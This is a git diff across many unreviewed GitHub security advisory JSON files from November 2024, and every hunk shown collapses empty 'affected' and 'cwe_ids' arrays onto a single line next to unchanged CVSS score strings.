b/advisories/unreviewed/2024/11/GHSA-cpmw-ff7x-cg2w/GHSA-cpmw-ff7x-cg2w.json index fad99862b10..ff061ab9755 100644 --- a/advisories/unreviewed/2024/11/GHSA-cpmw-ff7x-cg2w/GHSA-cpmw-ff7x-cg2w.json +++ b/advisories/unreviewed/2024/11/GHSA-cpmw-ff7x-cg2w/GHSA-cpmw-ff7x-cg2w.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-cpmx-w293-837f/GHSA-cpmx-w293-837f.json b/advisories/unreviewed/2024/11/GHSA-cpmx-w293-837f/GHSA-cpmx-w293-837f.json index 4f50dc5e1a6..a9e7545ac72 100644 --- a/advisories/unreviewed/2024/11/GHSA-cpmx-w293-837f/GHSA-cpmx-w293-837f.json +++ b/advisories/unreviewed/2024/11/GHSA-cpmx-w293-837f/GHSA-cpmx-w293-837f.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-crxp-pw8g-fqxp/GHSA-crxp-pw8g-fqxp.json b/advisories/unreviewed/2024/11/GHSA-crxp-pw8g-fqxp/GHSA-crxp-pw8g-fqxp.json index 7e1b23b6dd1..b49df6dceef 100644 --- a/advisories/unreviewed/2024/11/GHSA-crxp-pw8g-fqxp/GHSA-crxp-pw8g-fqxp.json +++ b/advisories/unreviewed/2024/11/GHSA-crxp-pw8g-fqxp/GHSA-crxp-pw8g-fqxp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-cvj9-g4h2-mvqx/GHSA-cvj9-g4h2-mvqx.json b/advisories/unreviewed/2024/11/GHSA-cvj9-g4h2-mvqx/GHSA-cvj9-g4h2-mvqx.json index 97325d196ad..694a0ce1759 100644 --- a/advisories/unreviewed/2024/11/GHSA-cvj9-g4h2-mvqx/GHSA-cvj9-g4h2-mvqx.json +++ b/advisories/unreviewed/2024/11/GHSA-cvj9-g4h2-mvqx/GHSA-cvj9-g4h2-mvqx.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-cw73-r42m-9xfp/GHSA-cw73-r42m-9xfp.json b/advisories/unreviewed/2024/11/GHSA-cw73-r42m-9xfp/GHSA-cw73-r42m-9xfp.json index 56c420d8f67..afc20ec74b7 100644 --- a/advisories/unreviewed/2024/11/GHSA-cw73-r42m-9xfp/GHSA-cw73-r42m-9xfp.json +++ b/advisories/unreviewed/2024/11/GHSA-cw73-r42m-9xfp/GHSA-cw73-r42m-9xfp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-f49x-gh9g-45wp/GHSA-f49x-gh9g-45wp.json b/advisories/unreviewed/2024/11/GHSA-f49x-gh9g-45wp/GHSA-f49x-gh9g-45wp.json index 687eda0138b..0cb851babaf 100644 --- a/advisories/unreviewed/2024/11/GHSA-f49x-gh9g-45wp/GHSA-f49x-gh9g-45wp.json +++ b/advisories/unreviewed/2024/11/GHSA-f49x-gh9g-45wp/GHSA-f49x-gh9g-45wp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-f58g-ghv3-pqv3/GHSA-f58g-ghv3-pqv3.json b/advisories/unreviewed/2024/11/GHSA-f58g-ghv3-pqv3/GHSA-f58g-ghv3-pqv3.json index 0b5391aa609..921e81e88e0 100644 --- a/advisories/unreviewed/2024/11/GHSA-f58g-ghv3-pqv3/GHSA-f58g-ghv3-pqv3.json +++ b/advisories/unreviewed/2024/11/GHSA-f58g-ghv3-pqv3/GHSA-f58g-ghv3-pqv3.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-f97j-93hw-h78h/GHSA-f97j-93hw-h78h.json b/advisories/unreviewed/2024/11/GHSA-f97j-93hw-h78h/GHSA-f97j-93hw-h78h.json index fe3d5552022..9b271cae42c 100644 --- a/advisories/unreviewed/2024/11/GHSA-f97j-93hw-h78h/GHSA-f97j-93hw-h78h.json +++ b/advisories/unreviewed/2024/11/GHSA-f97j-93hw-h78h/GHSA-f97j-93hw-h78h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-fc63-6853-v5m2/GHSA-fc63-6853-v5m2.json b/advisories/unreviewed/2024/11/GHSA-fc63-6853-v5m2/GHSA-fc63-6853-v5m2.json index 4134792b5b8..74ab13ef7e9 100644 --- a/advisories/unreviewed/2024/11/GHSA-fc63-6853-v5m2/GHSA-fc63-6853-v5m2.json +++ b/advisories/unreviewed/2024/11/GHSA-fc63-6853-v5m2/GHSA-fc63-6853-v5m2.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-ffvv-4q2x-m92p/GHSA-ffvv-4q2x-m92p.json b/advisories/unreviewed/2024/11/GHSA-ffvv-4q2x-m92p/GHSA-ffvv-4q2x-m92p.json index 21a15d51c36..c2991eed7fa 100644 --- a/advisories/unreviewed/2024/11/GHSA-ffvv-4q2x-m92p/GHSA-ffvv-4q2x-m92p.json +++ b/advisories/unreviewed/2024/11/GHSA-ffvv-4q2x-m92p/GHSA-ffvv-4q2x-m92p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-frfw-f98c-6jvj/GHSA-frfw-f98c-6jvj.json b/advisories/unreviewed/2024/11/GHSA-frfw-f98c-6jvj/GHSA-frfw-f98c-6jvj.json index 883a499834e..b400f835320 100644 --- a/advisories/unreviewed/2024/11/GHSA-frfw-f98c-6jvj/GHSA-frfw-f98c-6jvj.json +++ b/advisories/unreviewed/2024/11/GHSA-frfw-f98c-6jvj/GHSA-frfw-f98c-6jvj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-fv43-v7vc-rjjf/GHSA-fv43-v7vc-rjjf.json b/advisories/unreviewed/2024/11/GHSA-fv43-v7vc-rjjf/GHSA-fv43-v7vc-rjjf.json index 959c98f12c2..4e51dfb7325 100644 --- a/advisories/unreviewed/2024/11/GHSA-fv43-v7vc-rjjf/GHSA-fv43-v7vc-rjjf.json +++ b/advisories/unreviewed/2024/11/GHSA-fv43-v7vc-rjjf/GHSA-fv43-v7vc-rjjf.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-fvrc-whm3-2jqq/GHSA-fvrc-whm3-2jqq.json b/advisories/unreviewed/2024/11/GHSA-fvrc-whm3-2jqq/GHSA-fvrc-whm3-2jqq.json index ae8b0c12346..4abdc689815 100644 --- a/advisories/unreviewed/2024/11/GHSA-fvrc-whm3-2jqq/GHSA-fvrc-whm3-2jqq.json +++ b/advisories/unreviewed/2024/11/GHSA-fvrc-whm3-2jqq/GHSA-fvrc-whm3-2jqq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-fwfj-54vh-4r92/GHSA-fwfj-54vh-4r92.json b/advisories/unreviewed/2024/11/GHSA-fwfj-54vh-4r92/GHSA-fwfj-54vh-4r92.json index af0f12282e5..8c453d31ba3 100644 --- a/advisories/unreviewed/2024/11/GHSA-fwfj-54vh-4r92/GHSA-fwfj-54vh-4r92.json +++ b/advisories/unreviewed/2024/11/GHSA-fwfj-54vh-4r92/GHSA-fwfj-54vh-4r92.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-g488-86p5-88vr/GHSA-g488-86p5-88vr.json b/advisories/unreviewed/2024/11/GHSA-g488-86p5-88vr/GHSA-g488-86p5-88vr.json index 437afb4ef7f..7a2128c3518 100644 --- a/advisories/unreviewed/2024/11/GHSA-g488-86p5-88vr/GHSA-g488-86p5-88vr.json +++ b/advisories/unreviewed/2024/11/GHSA-g488-86p5-88vr/GHSA-g488-86p5-88vr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-g5x8-hfc7-9rv7/GHSA-g5x8-hfc7-9rv7.json b/advisories/unreviewed/2024/11/GHSA-g5x8-hfc7-9rv7/GHSA-g5x8-hfc7-9rv7.json index 5c7731a9a1e..1b5952bf316 100644 --- a/advisories/unreviewed/2024/11/GHSA-g5x8-hfc7-9rv7/GHSA-g5x8-hfc7-9rv7.json +++ b/advisories/unreviewed/2024/11/GHSA-g5x8-hfc7-9rv7/GHSA-g5x8-hfc7-9rv7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-g8j9-jfgw-6pqf/GHSA-g8j9-jfgw-6pqf.json b/advisories/unreviewed/2024/11/GHSA-g8j9-jfgw-6pqf/GHSA-g8j9-jfgw-6pqf.json index 63b7f4bc093..d931ccf7014 100644 --- a/advisories/unreviewed/2024/11/GHSA-g8j9-jfgw-6pqf/GHSA-g8j9-jfgw-6pqf.json +++ b/advisories/unreviewed/2024/11/GHSA-g8j9-jfgw-6pqf/GHSA-g8j9-jfgw-6pqf.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-g9hm-qffx-jwjh/GHSA-g9hm-qffx-jwjh.json b/advisories/unreviewed/2024/11/GHSA-g9hm-qffx-jwjh/GHSA-g9hm-qffx-jwjh.json index 6c94847122f..f814aba9850 100644 --- a/advisories/unreviewed/2024/11/GHSA-g9hm-qffx-jwjh/GHSA-g9hm-qffx-jwjh.json +++ b/advisories/unreviewed/2024/11/GHSA-g9hm-qffx-jwjh/GHSA-g9hm-qffx-jwjh.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-g9v3-rgcc-7jqh/GHSA-g9v3-rgcc-7jqh.json b/advisories/unreviewed/2024/11/GHSA-g9v3-rgcc-7jqh/GHSA-g9v3-rgcc-7jqh.json index 6f193acfc99..b28dc488c7e 100644 --- a/advisories/unreviewed/2024/11/GHSA-g9v3-rgcc-7jqh/GHSA-g9v3-rgcc-7jqh.json +++ b/advisories/unreviewed/2024/11/GHSA-g9v3-rgcc-7jqh/GHSA-g9v3-rgcc-7jqh.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-gcv7-3w7r-7v38/GHSA-gcv7-3w7r-7v38.json b/advisories/unreviewed/2024/11/GHSA-gcv7-3w7r-7v38/GHSA-gcv7-3w7r-7v38.json index 53f4a772b73..adbfec69973 100644 --- a/advisories/unreviewed/2024/11/GHSA-gcv7-3w7r-7v38/GHSA-gcv7-3w7r-7v38.json +++ b/advisories/unreviewed/2024/11/GHSA-gcv7-3w7r-7v38/GHSA-gcv7-3w7r-7v38.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-ghff-7r8p-2pr4/GHSA-ghff-7r8p-2pr4.json b/advisories/unreviewed/2024/11/GHSA-ghff-7r8p-2pr4/GHSA-ghff-7r8p-2pr4.json index 60f8ceaa44c..1552350ec90 100644 --- a/advisories/unreviewed/2024/11/GHSA-ghff-7r8p-2pr4/GHSA-ghff-7r8p-2pr4.json +++ b/advisories/unreviewed/2024/11/GHSA-ghff-7r8p-2pr4/GHSA-ghff-7r8p-2pr4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-grqm-9h73-5m86/GHSA-grqm-9h73-5m86.json b/advisories/unreviewed/2024/11/GHSA-grqm-9h73-5m86/GHSA-grqm-9h73-5m86.json index f92832060dc..fcad34e1b56 100644 --- a/advisories/unreviewed/2024/11/GHSA-grqm-9h73-5m86/GHSA-grqm-9h73-5m86.json +++ b/advisories/unreviewed/2024/11/GHSA-grqm-9h73-5m86/GHSA-grqm-9h73-5m86.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-gv8f-7qqp-f8mr/GHSA-gv8f-7qqp-f8mr.json b/advisories/unreviewed/2024/11/GHSA-gv8f-7qqp-f8mr/GHSA-gv8f-7qqp-f8mr.json index 2b39a392dfe..05f7f68cc3a 100644 --- a/advisories/unreviewed/2024/11/GHSA-gv8f-7qqp-f8mr/GHSA-gv8f-7qqp-f8mr.json +++ b/advisories/unreviewed/2024/11/GHSA-gv8f-7qqp-f8mr/GHSA-gv8f-7qqp-f8mr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-gw8m-ww5h-rf9w/GHSA-gw8m-ww5h-rf9w.json b/advisories/unreviewed/2024/11/GHSA-gw8m-ww5h-rf9w/GHSA-gw8m-ww5h-rf9w.json index 321f6e64cf6..2ec2f7d7c0c 100644 --- a/advisories/unreviewed/2024/11/GHSA-gw8m-ww5h-rf9w/GHSA-gw8m-ww5h-rf9w.json +++ b/advisories/unreviewed/2024/11/GHSA-gw8m-ww5h-rf9w/GHSA-gw8m-ww5h-rf9w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-gxmf-6vg5-f87h/GHSA-gxmf-6vg5-f87h.json b/advisories/unreviewed/2024/11/GHSA-gxmf-6vg5-f87h/GHSA-gxmf-6vg5-f87h.json index f1820a8ed1e..75852fc086d 100644 --- a/advisories/unreviewed/2024/11/GHSA-gxmf-6vg5-f87h/GHSA-gxmf-6vg5-f87h.json +++ b/advisories/unreviewed/2024/11/GHSA-gxmf-6vg5-f87h/GHSA-gxmf-6vg5-f87h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-h3rc-229h-wgjg/GHSA-h3rc-229h-wgjg.json b/advisories/unreviewed/2024/11/GHSA-h3rc-229h-wgjg/GHSA-h3rc-229h-wgjg.json index e11522b0161..3a6e79cec52 100644 --- a/advisories/unreviewed/2024/11/GHSA-h3rc-229h-wgjg/GHSA-h3rc-229h-wgjg.json +++ b/advisories/unreviewed/2024/11/GHSA-h3rc-229h-wgjg/GHSA-h3rc-229h-wgjg.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-hpg3-hj89-68jh/GHSA-hpg3-hj89-68jh.json b/advisories/unreviewed/2024/11/GHSA-hpg3-hj89-68jh/GHSA-hpg3-hj89-68jh.json index 1a69936abb6..d1ebbb67758 100644 --- a/advisories/unreviewed/2024/11/GHSA-hpg3-hj89-68jh/GHSA-hpg3-hj89-68jh.json +++ b/advisories/unreviewed/2024/11/GHSA-hpg3-hj89-68jh/GHSA-hpg3-hj89-68jh.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-j4rg-rp32-grwp/GHSA-j4rg-rp32-grwp.json b/advisories/unreviewed/2024/11/GHSA-j4rg-rp32-grwp/GHSA-j4rg-rp32-grwp.json index 15abb91b774..57ea843c7c6 100644 --- a/advisories/unreviewed/2024/11/GHSA-j4rg-rp32-grwp/GHSA-j4rg-rp32-grwp.json +++ b/advisories/unreviewed/2024/11/GHSA-j4rg-rp32-grwp/GHSA-j4rg-rp32-grwp.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-j6wf-wwwg-83hx/GHSA-j6wf-wwwg-83hx.json b/advisories/unreviewed/2024/11/GHSA-j6wf-wwwg-83hx/GHSA-j6wf-wwwg-83hx.json index 1f4688a8c18..25f2821610f 100644 --- a/advisories/unreviewed/2024/11/GHSA-j6wf-wwwg-83hx/GHSA-j6wf-wwwg-83hx.json +++ b/advisories/unreviewed/2024/11/GHSA-j6wf-wwwg-83hx/GHSA-j6wf-wwwg-83hx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-j8q3-w84x-4phr/GHSA-j8q3-w84x-4phr.json b/advisories/unreviewed/2024/11/GHSA-j8q3-w84x-4phr/GHSA-j8q3-w84x-4phr.json index 986851d6e23..a7816b3b9f7 100644 --- a/advisories/unreviewed/2024/11/GHSA-j8q3-w84x-4phr/GHSA-j8q3-w84x-4phr.json +++ b/advisories/unreviewed/2024/11/GHSA-j8q3-w84x-4phr/GHSA-j8q3-w84x-4phr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-jfp4-pv53-rv88/GHSA-jfp4-pv53-rv88.json b/advisories/unreviewed/2024/11/GHSA-jfp4-pv53-rv88/GHSA-jfp4-pv53-rv88.json index a4994988d58..13ef90f409f 100644 --- a/advisories/unreviewed/2024/11/GHSA-jfp4-pv53-rv88/GHSA-jfp4-pv53-rv88.json +++ b/advisories/unreviewed/2024/11/GHSA-jfp4-pv53-rv88/GHSA-jfp4-pv53-rv88.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-jv8w-8mj7-43gf/GHSA-jv8w-8mj7-43gf.json b/advisories/unreviewed/2024/11/GHSA-jv8w-8mj7-43gf/GHSA-jv8w-8mj7-43gf.json index 753517ab57a..168b734fa9b 100644 --- a/advisories/unreviewed/2024/11/GHSA-jv8w-8mj7-43gf/GHSA-jv8w-8mj7-43gf.json +++ b/advisories/unreviewed/2024/11/GHSA-jv8w-8mj7-43gf/GHSA-jv8w-8mj7-43gf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-jxjx-p54m-47jc/GHSA-jxjx-p54m-47jc.json b/advisories/unreviewed/2024/11/GHSA-jxjx-p54m-47jc/GHSA-jxjx-p54m-47jc.json index 169d57ffb4d..58e870cd9b2 100644 --- a/advisories/unreviewed/2024/11/GHSA-jxjx-p54m-47jc/GHSA-jxjx-p54m-47jc.json +++ b/advisories/unreviewed/2024/11/GHSA-jxjx-p54m-47jc/GHSA-jxjx-p54m-47jc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-m4g4-rwxc-376v/GHSA-m4g4-rwxc-376v.json b/advisories/unreviewed/2024/11/GHSA-m4g4-rwxc-376v/GHSA-m4g4-rwxc-376v.json index 9a983d8b895..a23a635d534 100644 --- a/advisories/unreviewed/2024/11/GHSA-m4g4-rwxc-376v/GHSA-m4g4-rwxc-376v.json +++ b/advisories/unreviewed/2024/11/GHSA-m4g4-rwxc-376v/GHSA-m4g4-rwxc-376v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-m4m9-v4mx-256j/GHSA-m4m9-v4mx-256j.json b/advisories/unreviewed/2024/11/GHSA-m4m9-v4mx-256j/GHSA-m4m9-v4mx-256j.json index d2d9eac72d8..d7533f17b78 100644 --- a/advisories/unreviewed/2024/11/GHSA-m4m9-v4mx-256j/GHSA-m4m9-v4mx-256j.json +++ b/advisories/unreviewed/2024/11/GHSA-m4m9-v4mx-256j/GHSA-m4m9-v4mx-256j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-m5hv-r49v-rq3w/GHSA-m5hv-r49v-rq3w.json b/advisories/unreviewed/2024/11/GHSA-m5hv-r49v-rq3w/GHSA-m5hv-r49v-rq3w.json index dd47598bc9b..0f8c6fac662 100644 --- a/advisories/unreviewed/2024/11/GHSA-m5hv-r49v-rq3w/GHSA-m5hv-r49v-rq3w.json +++ b/advisories/unreviewed/2024/11/GHSA-m5hv-r49v-rq3w/GHSA-m5hv-r49v-rq3w.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-m7p9-qq2j-2h4p/GHSA-m7p9-qq2j-2h4p.json b/advisories/unreviewed/2024/11/GHSA-m7p9-qq2j-2h4p/GHSA-m7p9-qq2j-2h4p.json index 9c85be6e136..f7f1d2fffba 100644 --- a/advisories/unreviewed/2024/11/GHSA-m7p9-qq2j-2h4p/GHSA-m7p9-qq2j-2h4p.json +++ 